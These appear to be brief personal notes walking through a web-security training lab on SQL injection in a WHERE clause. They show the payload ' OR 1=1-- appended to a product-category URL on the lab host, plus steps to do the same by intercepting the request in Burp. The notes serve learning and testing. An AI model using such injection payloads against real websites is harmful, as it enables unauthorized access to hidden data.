1 Lab SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- Not all the categories or items are vulnerable
- Click 'Food & Drink' category
- Add `'+OR+1=1--` to the end of the web address, changing it to:
  https://0a79003904b631fe80c7dfb5004400e6.web-security-academy.net/filter?category=Food+%26+Drink'+OR+1=1--
Or use [[Burp]]:
- Open [[burp]]
- Open the [[burp]] browser
- Navigate to the homepage with all categories
- Turn on intercept
- Modify the request that sets the product category filter